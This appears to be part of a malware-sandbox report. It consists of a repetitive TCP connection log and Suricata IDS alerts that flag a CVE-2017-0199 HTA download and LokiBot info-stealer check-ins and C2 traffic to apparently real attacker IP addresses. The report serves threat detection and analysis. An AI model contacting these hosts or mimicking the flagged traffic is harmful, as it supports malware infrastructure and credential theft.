        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49164
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49166
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49190
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49191
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49209
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.220:80
